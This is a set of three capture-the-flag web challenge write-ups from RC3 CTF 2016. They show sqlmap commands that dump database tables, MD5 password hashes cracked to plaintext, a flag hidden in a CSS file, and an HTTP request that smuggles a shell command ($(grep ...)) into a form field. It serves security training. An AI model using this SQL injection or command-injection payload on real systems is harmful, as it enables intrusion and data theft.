Nov 20, 2016 - RC3 CTF : Just Joking, Joker Joked

Author: dade

Publish Date: 2016-11-20

Category: Web

Points: 200


Yes, that is gramatically correct. Now who doesn't love a good book and an even better villain?

With Love,

Joker xx

"Hint: 200: Flags aren't in plaintext"


I kind of cheated here, I normally wouldn’t resort to running sqlmap immediately. But in the end, I used it to dumb tables.

$ sqlmap -u "" --dbs
$ sqlmap -u "" --tables
$ sqlmap -u "" -D CCNs -T basic
$ sqlmap -u "" -D CCNs -T secrets

I used this to dump tables, I also dumped the rest of the tables but nothing looked especially interesting.

	| id | name         | gender |
	| 1  | Harley Quinn | Female |
	| 2  | Riddler      | ?      |
	| 3  | Joker        | HAHAHA |
	| 5  | Two-Face     | Male   |
	| id | User    | Password                         |
	| 1  | Admin   | 3118dd54268acb0f04a048fd090e14f7 |
	| 2  | Guy     | c9846fa3e401252cf822a21ecf6a567e |
	| 3  | Joker   | c417fccfc5d5a288243c96359c62c381 |
	| 4  | Colonel | adac9d4711cd21cc4cec1b0f8e7ca538 |

Looking at the flag.welcome table, the flag claims to be pcbfcppgle. I also happen to be told in the hint that “flags aren’t in plaintext” so let’s rotate that flag.

Using my favorite caesar cipher tool we put that in and choose “Guess” for the key, and it finds that with a key of 2 the flag translates to redherring. How annoying.

Looking at the CCNs.secrets table, we see some hashes. Let’s try to crack ( those.

3118dd54268acb0f04a048fd090e14f7 -> NiceTry

Again, how annoying.

Two hours later...

Let’s see if any online databases have the other hashes.

Crackstation? Nope.

Hashkiller? Nope. Yup.

3118dd54268acb0f04a048fd090e14f7 -> NiceTry
c9846fa3e401252cf822a21ecf6a567e -> InfectiousLaughter
c417fccfc5d5a288243c96359c62c381 -> RC3-2016-HAHAHAHA
adac9d4711cd21cc4cec1b0f8e7ca538 -> TheRealSanders



Nov 20, 2016 - RC3 CTF : Who's a good boy

Author: dade

Publish Date: 2016-11-20

Category: Web

Points: 100


You’re trying to see the cute dog pictures on But every time you click on one of them, it brings you to a bad gateway.

-- Your friendly neighborhood webadmin


Quickly scrolling through the page, I noticed that one image was broken. Inspecting that image gives us this:

<img class="philarydufflebag" src="'re-getting-there-though.jpg">

Not the flag, but we’re close. Looking through the rest of the contents of the page there wasn’t much. Let’s check out the only other thing we seem to be given, doge.css.

Sure enough, scroll to the bottom of doge.css and you can find the flag.



Nov 20, 2016 - RC3 CTF : Bork Bork

Author: dade

Publish Date: 2016-11-20

Category: Web

Points: 300


UPDATE: We have made changes to this challenge to make it (somewhat) stable. If what you were trying before is not working, it's because it was causing a problem for us on the back end. I assure you that what you were doing was not the easiest solution, anyway.

We all love doggos and puppers. Have some more of one of our favorite puppers, Gabe. Bork.



If you post to /bork and try to grab a random file, say, flag.txt, it prints out an error

cat: borks/flag.txt: No such file or directory?autoplay=1&loop=1

This means it’s taking our input and passing it to “cat”. Can we abuse this to disclose other files? What about chain commands for command injection? It looks like when we try to do something not allowed we get presented with an error page

TFW You Can't Pet Gabe

After some more testing, I found that some commands could be injected while others were being filtered. Note: In an effort to increase stability, eventually even $ methods of injection were filtered out, making my solution incorrect. Doesn’t matter, had flag.

However, I was able to succeed by passing the following:

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

bork=$(grep -r '.' -e "RC3")

Which returned:

HTTP/1.1 200 OK
Server: nginx/1.10.0 (Ubuntu)
Date: Sat, 19 Nov 2016 22:20:50 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Content-Length: 416

<!DOCTYPE html>
        <link rel="stylesheet" type="text/css" href="/static/bork.css">
        <link rel="shortcut icon" href="/static/favicon.ico">
        <h1>HERE'S YOUR BORK!!!!</h1>
        <iframe width="854" height="480" src="cat: &#39;borks/./bork.txt:RC3-2016-L057d0g3&#39;: No such file or directory?autoplay=1&loop=1" frameborder="0"></iframe>

That looks like a flag to me!